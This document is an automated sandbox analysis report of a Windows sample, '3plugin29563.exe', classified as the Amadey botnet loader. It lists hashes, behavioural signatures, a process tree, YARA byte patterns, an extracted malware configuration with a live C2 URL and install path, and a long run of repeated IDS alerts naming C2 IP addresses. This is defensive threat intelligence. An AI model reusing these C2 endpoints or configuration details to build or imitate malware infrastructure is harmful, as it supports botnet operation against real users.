Edit tour

Windows Analysis Report
3plugin29563.exe

Overview

General Information

Sample name:	3plugin29563.exe
Analysis ID:	1499741
MD5:	5886235e78709ba971a3b4cdfdc336ee
SHA1:	856e9688e3e087489d6d4ef02b7317d3cbc1fff7
SHA256:	059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

3plugin29563.exe (PID: 3476 cmdline: "C:\Users\user\Desktop\3plugin29563.exe" MD5: 5886235E78709BA971A3B4CDFDC336EE)

WerFault.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 728 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 808 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 4016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1028 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1092 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1136 MD5: C31336C1EFC2CCB44B4326EA793040F2)

Hkbsse.exe (PID: 7108 cmdline: "C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe" MD5: 5886235E78709BA971A3B4CDFDC336EE)

WerFault.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 560 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 568 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 580 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1184 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41", "Install Folder": "239f17af5a", "Install File": "Hkbsse.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x14d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1740:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2155291300.0000000002180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000003.2335941103.0000000000970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.3plugin29563.exe.2110e67.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.3plugin29563.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.3.Hkbsse.exe.970000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.Hkbsse.exe.6f0e67.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.3plugin29563.exe.2110e67.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.3plugin29563.exe.2180000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.3.Hkbsse.exe.970000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.Hkbsse.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.Hkbsse.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.Hkbsse.exe.6f0e67.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.3plugin29563.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.3plugin29563.exe.2180000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 7 entries

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:19:31.435478+0200
SID:	2856148
Severity:	1
Source Port:	52219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:43.100007+0200
SID:	2856148
Severity:	1
Source Port:	52370
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:15.580908+0200
SID:	2856148
Severity:	1
Source Port:	52586
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:45.157697+0200
SID:	2856148
Severity:	1
Source Port:	52253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:50.557182+0200
SID:	2856148
Severity:	1
Source Port:	52264
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:39.748628+0200
SID:	2856148
Severity:	1
Source Port:	52364
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:36.561898+0200
SID:	2856148
Severity:	1
Source Port:	52359
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:58.939664+0200
SID:	2856148
Severity:	1
Source Port:	52280
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:22.975531+0200
SID:	2856148
Severity:	1
Source Port:	52330
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:10.496184+0200
SID:	2856148
Severity:	1
Source Port:	52574
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:33.482369+0200
SID:	2856148
Severity:	1
Source Port:	52229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:04.262728+0200
SID:	2856148
Severity:	1
Source Port:	52293
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:19.685889+0200
SID:	2856148
Severity:	1
Source Port:	52317
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:19.450218+0200
SID:	2856148
Severity:	1
Source Port:	52322
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:47.087856+0200
SID:	2856148
Severity:	1
Source Port:	52523
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:40.895829+0200
SID:	2856148
Severity:	1
Source Port:	52245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:44.014758+0200
SID:	2856148
Severity:	1
Source Port:	52516
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:10.044027+0200
SID:	2856148
Severity:	1
Source Port:	52434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:55.810852+0200
SID:	2856148
Severity:	1
Source Port:	52400
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:45.541382+0200
SID:	2856148
Severity:	1
Source Port:	52520
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:15.236875+0200
SID:	2856148
Severity:	1
Source Port:	52446
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:59.144425+0200
SID:	2856148
Severity:	1
Source Port:	52406
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:17.107525+0200
SID:	2856148
Severity:	1
Source Port:	52318
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:59.576313+0200
SID:	2856148
Severity:	1
Source Port:	52282
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:39.794330+0200
SID:	2856148
Severity:	1
Source Port:	52241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:26.575494+0200
SID:	2856148
Severity:	1
Source Port:	52338
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:07.638804+0200
SID:	2856148
Severity:	1
Source Port:	52299
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:39.314619+0200
SID:	2856148
Severity:	1
Source Port:	52504
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:52.592279+0200
SID:	2856148
Severity:	1
Source Port:	52675
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:03.217651+0200
SID:	2856148
Severity:	1
Source Port:	52560
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:48.029573+0200
SID:	2856148
Severity:	1
Source Port:	52517
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:16.948103+0200
SID:	2856148
Severity:	1
Source Port:	52591
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:44.451617+0200
SID:	2856148
Severity:	1
Source Port:	52657
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:11.989441+0200
SID:	2856148
Severity:	1
Source Port:	52578
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:50.208984+0200
SID:	2856148
Severity:	1
Source Port:	52667
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:12.232849+0200
SID:	2856148
Severity:	1
Source Port:	52579
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:12.232849+0200
SID:	2856148
Severity:	1
Source Port:	52570
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:57.292821+0200
SID:	2856148
Severity:	1
Source Port:	52688
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:42.300416+0200
SID:	2856148
Severity:	1
Source Port:	52512
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:44.014846+0200
SID:	2856148
Severity:	1
Source Port:	52515
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:32.828919+0200
SID:	2856148
Severity:	1
Source Port:	52351
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:47.545451+0200
SID:	2856148
Severity:	1
Source Port:	52258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:42.892528+0200
SID:	2856148
Severity:	1
Source Port:	52653
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:10.469408+0200
SID:	2856148
Severity:	1
Source Port:	52301
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:46.025463+0200
SID:	2856148
Severity:	1
Source Port:	52661
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:49.092166+0200
SID:	2856148
Severity:	1
Source Port:	52385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:09.805412+0200
SID:	2856148
Severity:	1
Source Port:	52303
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:48.461938+0200
SID:	2856148
Severity:	1
Source Port:	52259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:52.592217+0200
SID:	2856148
Severity:	1
Source Port:	52668
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:33.110351+0200
SID:	2856148
Severity:	1
Source Port:	52630
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:14.230992+0200
SID:	2856148
Severity:	1
Source Port:	52445
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:53.665209+0200
SID:	2856148
Severity:	1
Source Port:	52271
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:53.171455+0200
SID:	2856148
Severity:	1
Source Port:	52268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:52.601087+0200
SID:	2856148
Severity:	1
Source Port:	52270
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:08.980983+0200
SID:	2856148
Severity:	1
Source Port:	52572
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:20.264007+0200
SID:	2856148
Severity:	1
Source Port:	52599
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:43.768567+0200
SID:	2856148
Severity:	1
Source Port:	52366
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:42.016326+0200
SID:	2856148
Severity:	1
Source Port:	52246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:17.635643+0200
SID:	2856148
Severity:	1
Source Port:	52453
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:12.953459+0200
SID:	2856148
Severity:	1
Source Port:	52581
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:37.373463+0200
SID:	2856148
Severity:	1
Source Port:	52358
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:34.637379+0200
SID:	2856148
Severity:	1
Source Port:	52633
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:39.141295+0200
SID:	2856148
Severity:	1
Source Port:	52505
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:11.638827+0200
SID:	2856148
Severity:	1
Source Port:	52302
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:52.045254+0200
SID:	2856148
Severity:	1
Source Port:	52534
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:15.663490+0200
SID:	2856148
Severity:	1
Source Port:	52316
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:03.428843+0200
SID:	2856148
Severity:	1
Source Port:	52559
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:46.351545+0200
SID:	2856148
Severity:	1
Source Port:	52256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:13.266721+0200
SID:	2856148
Severity:	1
Source Port:	52309
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:15.889029+0200
SID:	2856148
Severity:	1
Source Port:	52442
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:56.060842+0200
SID:	2856148
Severity:	1
Source Port:	52544
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:00.076654+0200
SID:	2856148
Severity:	1
Source Port:	52553
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:07.857592+0200
SID:	2856148
Severity:	1
Source Port:	52421
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

